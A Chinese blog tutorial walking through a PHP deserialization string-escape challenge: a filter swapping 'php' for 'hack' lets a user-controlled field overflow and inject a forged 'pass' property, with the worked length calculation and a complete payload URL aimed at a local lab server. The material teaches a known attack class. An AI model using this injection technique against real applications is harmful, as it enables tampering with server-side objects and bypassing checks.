全网最详细!小白必看!!php反序列化难点(字符串逃逸)

已于 2024-09-15 20:11:12 修改
阅读量767 收藏 20
点赞数 16
文章标签: android android studio ide
于 2024-09-09 15:24:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70065235/article/details/142060144
版权

Dest1ny安全    2024年09月09日 15:18

今天也是php反序列化教程,是一个难点解析~,关于字符串逃逸!这是Dest1ny的第二篇文章,准备好了吗!

我叫Dest1ny,制作不易,求关注!

CLASS-1 什么是字符串逃逸?

我们先看正经的关于字符串逃逸:

PHP 反序列化漏洞中的字符串逃逸(String Escape)主要涉及在恶意输入的反序列化数据中操纵字符串,导致预期之外的行为。反序列化是将存储或传输的序列化数据转换回原始数据的过程。当反序列化未被安全处理时,攻击者可以利用漏洞注入恶意数据,使得代码执行或操作数据结构变得不可预测。

ok,也是一个字不想看。那我们直接上这期的题目,来看看怎么个事。

CLASS-2 今日例题!

这是我们今天要做的例题:

图片

大家可以先看一下这段代码在干嘛,我从上到下讲一下:

  1. 一个filter方法,是个有过滤功能的方法,把输入进来的字符串里的flag和php替换成hack。

  2. 一个test模版,里面有两个公共属性,user和pass,还有一个construct的魔法函数,这种魔法函数是在使用test模版新建一个对象的时候会触发。

  3. 给了一个可以用get接口去传参数,再用test模版新建了一个对象,再去序列化。

4. 再将序列化完的字符串进行过滤,查看是否有flag或者php并替换,最后再反序列化。

最后判断test新建对象里的属性pass的值是不是escaping,则会输出flag

这是注释版本:

图片

所以看完之后大家肯定说,那我直接让test里的pass里的值变成escaping就可以了吧,那大家记不记得我说过,这里有一个魔法函数,construct,只要源代码有新建test类的新对象,那必然要去执行construct!

图片

这里只让传user的值,我上哪去改pass啊??????

CLASS-3 逃逸来了!

图片

这个对于大家来说很容易看懂,如果还没啥概念,看我第一篇php反序列化文章就好。

序列化结果是这样的:

O:4:"test":2:{s:4:"user";s:4:"aaaa";s:4:"pass";s:4:"bbbb";}

这个都看得懂吧,那比如我稍微改了一下呢?

O:4:"test":2:{s:4:"user";s:12:"aaaa";s:4:"pass";s:4:"bbbb";}

问:这时候user的值是什么

答:aaaa";s:4:"pass

大家发现了什么,php好霸道,我把4变成12,他不管我后面是啥,直接给我吞到user的值里了。

大家看我这个过滤函数

图片

如果我序列化里有php,他会转换成hack??那我s:后面的数字变吗?

O:4:"test":2:{s:4:"user";s:15:"hackhackhackhackhack";s:4:"pass";s:8:"daydream";}";

图片

我故意去用php去代替hack,发现s后面的数字还是按照php的数量来的,然而hack替换了五次!

问:user的值是什么

答:hackhackhackhac ???

那我只要可以让string的值变得合理,是不是可以多去构造值呢?

图片

嘿嘿,我直接;}直接来个到这结束,整个字符串是什么样子呢?

s:83:"O:4:"test":2:{s:4:"user";s:18:"hackhackhackhackhack";}";s:4:"pass";s:8:"daydream";}";

因为我用了;}

所以最后结果是:

O:4:"test":2:{s:4:"user";s:18:"hackhackhackhackhack";}

直接改变结构了,但是这还不是很成功,我test有两个属性,我需要修改pass的值,所以是不是我只要控制好吞字符的数量就可以在只可以传user属性的时候能去修改pass的值!

CLASS-4 happy ending !

所以思路很清楚了

1. 我们理论上只能去修改user值

2. 题目需要我们去修改pass值

3. 我们发现可能有字符逃逸的可能

4. 去使用php和hack替换出现的字符数量的差异去构造序列化格式,在user的值里去再控制pass值!

我们理想状态是这样的:

O:4:"test":2:{s:4:"user";s:??:"这里不确定有多少hack";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}";

然后因为提前断掉了。

所以最后的结果是:

O:4:"test":2:{s:4:"user";s:?:"?";s:4:"pass";s:8:"escaping";}

诶你看,就算把我标蓝的地方断掉了,可是test里还是两个属性,完美!

所以我们payload肯定有;s:4:"pass";s:8:"escaping";}这串字符,那我如何很完美让他构造在序列化里呢

要去计算一下

;s:4:"pass";s:8:"escaping";}   27个字符

那我设需要填入x个php,加上24个字符正好等于x个hack

3x + 27 = 4x

算出x为27

我们试一下输入27个php

图片

ok输出

O:4:"test":2:{s:4:"user";s:116:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}";

这里的hack把116个字符填满了,而且经过我们计算在最后一个hack之后加上";,让php觉得ok,已经结束了,其实我们帮助pass逃脱舒服,可以拿到我们想要的值了!

payload发一下

http://127.0.0.1:8088/class16/1.php?param=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp%22;s:4:%22pass%22;s:8:%22escaping%22;}

直接拿下flag

图片

惯例,来个例子:

我们想越狱 -> 发现狱警只会数人数不会查人脸 ->我们找了几个替死鬼在新的进监狱的人里混进来 -> 让他们代替我们坐牢 -> 只要他们不承认自己是替死鬼 -> 我们就是自由的

Dest1ny-安全
关注
golang json 序列化、反序列化 字符串反序列化成 map[string]interface{}
程序员光剑
06-28 1万+
json.Unmarshl 反序列化 : 将 json 字符串转为结构体 func Unmarshal(data []byte, v interface{}) error 需求:将 json 字符串转为结构体 1)预先定义json对应的结构体类型; 2)调用 json.Unmarshl func main() { // 这里反引号表示不转意,即为string类型 resp := `...
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 3903
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_POST['password']; if(strlen($username
php 反序列化逃逸
qq_45570082的博客
04-28 755
php反序列化逃逸 前提知识 PHP反序列化时,底层代码是以;作为字段的分隔,以}作为结尾(数组、对象等类型);反序列化时,结尾后的字符串会被忽略掉,例如: php > print_r(serialize([1])); a:1:{i:0;i:1;} php > print_r(unserialize('a:1:{i:0;i:1;}sdasda')); Array ( [0]...
php反序列化漏洞详解
最新发布
apple_74953689的博客
07-26 734
以上代码在反序列化之后,会触发__destruct()魔术方法,该方法中有命令执行函数eval(),又因为反序列化生成的对象里的值,由反序列化里的值提供;**注意:**序列化之后长度s获取的字符串的长度一定为s,否则会继续往后读,并且unserialize会把多余的字符串当垃圾处理,在{}内的就是正确的,{}后面的就都被丢弃。3、而调用__call方法的前提是在对象上下文中调用不存在的方法,刚好__destruct方法调用了一个不存在的函数,而__destruct方法在对象被销毁时触发。
php反序列化学习之字符串逃逸
oyf3085227433的博客
02-13 1212
学习一下php反序列化字符串逃逸的知识点
PHP反序列化字符逃逸
xiao_he0123的博客
03-16 817
PHP序列化和反序列化前言一、PHP序列化(serialize)二、PHP反序列化(unserialize)三、魔幻函数四、PHP反序列化字符逃逸1.替换修改后导致序列化字符串变长2.替换之后导致序列化字符变短 前言 一、PHP序列化(serialize) 序列化就是将变量或者对象转换为字符串的过程 #序列化结果: o:1:"A":2:{s:4:"name";s:4:"aaaa";s:4:"pass";s:6:"123456";} //o 即object简写的对象 //1 对象的字符数(这里对象是后面
php反序列化学习——字符串逃逸
m0_73756016的博客
03-13 1075
如果我们通过构造使其里面的内容为'hkhk";s:4:"pass";s:xx:"' 这样我们通过构造可控变量pass的值 让它后面变成s:3:"vip";这里的思路也是通过构造让后面的k变成‘ ";s:4:"pass";这里user的字符串已经从flagflag 替换成了hkhk 但是字符串长度还是8 这样 他就会以为user里面的内容为‘hkhk";s:4:"pass";}就会结束 就相当于后面s:1:"b";s:4:"pass";
Json Js Json对象 Json字符串 序列化与反序列化
许久
12-07 2335
Json Js Json对象 Json字符串 序列化与反序列化 Json JavaScript Object Notation -JavaScript 用于存储和交换文本信息的语法,进行数据的传输,JSON比 XML 更小、更快,更易解析。 var person = {"name": "张三", age: 23, 'gender': true}; var ps = [{"name": "张三", "age": 23, "gender": true}, {"name": "李四", "
CTF—Python考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4023
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
SOME/IP协议详解「2.1.5·序列化:字符串|Strings」
雪云飞星的博客
01-24 2325
SOME/IP协议详解「2.1.5·序列化:字符串|Strings」 点击返回雪云飞星的SOME/IP协议详解「总目录」 SOME/IP协议详解「2.1.5·序列化:字符串|Strings」1 字符串序列化2 静态字符串3 动态字符串 1 字符串序列化 2 静态字符串 3 动态字符串 点击返回雪云飞星的SOME/IP协议详解「总目录」 ...
PHP反序列化漏洞利用及修复,示例代码讲解
白帽子凯哥聊黑客
01-03 1693
您提到的PHP反序列化漏洞是一个重要的网络安全问题。在我的网络安全工程师的角色下,我可以提供关于此问题的深入分析。PHP反序列化漏洞通常发生在当不可信的数据被反序列化时。序列化是将数据结构或对象状态转换为可存储或可传输的格式的过程,而反序列化则是将这些格式转换回原始的数据结构或对象。在PHP中,如果反序列化的数据被恶意篡改,攻击者可以执行任意代码,导致应用程序或系统的安全风险。:当应用程序将不可信的数据传递给函数时,可能产生反序列化漏洞。这可能导致对象注入攻击。
php反序列化--字符串逃逸
YkingH的博客
03-14 5103
php反序列化字符串逃逸 PHP反序列化字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
php反序列化字符串逃逸
weixin_47813861的博客
10-08 275
最近回顾了几道php反序列化的基础题,就随便写一类个人比较中意的题型——字符串逃逸。 这里以ctfshow262为例。 有两部分源码 index.php <?php error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct($f,$m,$t){ $this-&
php反序列化学习之字符串逃逸(1),2024年最新学网络安全的入门基础知识
erthre的博客
04-15 552
构造闭合,然后让php反序列化我们设计好的序列化字符串,从而修改变量,尝试把info的值赋值为上面红框里的序列化字符串,那为什么不跟变长的类型一样,直接把序列化字符串跟在name的值后面呢?如果跟在name后面,由于name的长度本身就很长,过滤后name的值变短了,我们的序列化字符串就会被读取为name的值(逃不出去),就无法发挥它的作用了,所以要把info的值设为序列化字符串。如果要让绿框内的字符串正常反序列化,而不是被当作字符串读取,红框内的全部内容就填充进name的值中,";
四个实例递进php反序列化漏洞理解
大方子
09-14 8252
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...
PHP反序列化漏洞原理与举例
W小哥
03-03 404
原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。 在反序列化的过程中自动触发了某些魔术方法。 漏洞触发条件: unserialize函数的变量可控,php文件中存在可利用的类,类中有魔术方法 魔术方法: __construct()当一个对象创建时被调用 __destruct()当一个对象销毁时被调用 __toStrin...
PHP反序列化字符串逃逸
v2ish1yan的博客
04-15 1731
php反序列化字符串逃逸
php反序列化实例详解之字符串逃逸
wboy_的博客
05-06 298
本篇文章给大家带来了关于PHP的相关知识,其中主要介绍了关于反序列化的相关问题,PHP反序列化字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少,下面一起看一下,希望对大家有帮助。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值